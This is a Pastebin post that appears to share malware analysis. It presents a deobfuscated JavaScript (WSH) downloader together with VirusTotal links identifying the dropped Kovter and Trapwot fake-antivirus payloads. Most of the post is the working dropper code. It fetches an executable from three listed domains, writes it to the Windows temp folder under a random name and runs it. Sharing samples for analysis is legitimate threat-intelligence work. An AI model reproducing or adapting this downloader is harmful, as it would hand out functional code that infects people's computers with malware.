Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- deobfuscated and beuatified version of malicious WSH .js file
- https://www.virustotal.com/en/file/9ffbd096aab7d309e6119663f1c6628ae9fb7d2f5eaeabeaa53ef7b682990103/analysis/
- sends get requests like:
- www.mybusinessdoc.com/document.php?rnd=1071&id=55555C5E031601032405123412345
- lawyermyowin.com/document.php?rnd=1071&id=55555C5E031601032405123412345
- gurutravel.co.nz/document.php?rnd=1071&id=55555C5E031601032405123412345
- using a windows IE user-agent you get one of:
- kovter:
- https://www.virustotal.com/en/file/8006cb3906911cf0454818d55a9c7e340f34e4ab4d056dce9f40cb9396f00e3a/analysis/
- trapwot fakeav:
- https://www.virustotal.com/en/file/a332f99155f4c1e1dcc7fb68e1f1eb578a7db1e4d05f8d4c40b6ed5b16f3a369/analysis/
- ----------------------
- var listing="55555C5E031601031234123112341234";
- function dl(fr) {
- var b = "www.mybusinessdoc.com lawyermyowin.com gurutravel.co.nz".split(" ");
- for (var i = 0; i < b.length; i++) {
- var ws = new ActiveXObject("WScript.Shell");
- var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + Math.round(Math.random() * 100000000) + ".exe";
- var dn = 0;
- var xo = new ActiveXObject("MSXML2.XMLHTTP");
- xo.onreadystatechange = function () {
- if (xo.readyState == 4 && xo.status == 200) {
- var xa = new ActiveXObject("ADODB.Stream");
- xa.open();
- xa.type = 1;
- xa.write(xo.ResponseBody);
- if (xa.size > 5000) {
- dn = 1;
- xa.position = 0;
- xa.saveToFile(fn, 2);
- try {
- ws.Run(fn, 1, 0);
- } catch (er) {};
- };
- xa.close();
- };
- };
- try {
- xo.open("GET", "http://" + b[i] + "/document.php?rnd=" + fr + "&id=" + listing, false);
- xo.send();
- } catch (er) {};
- if (dn == 1) break;
- }
- };
- dl(1071);
- dl(1382);
- dl(3673);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement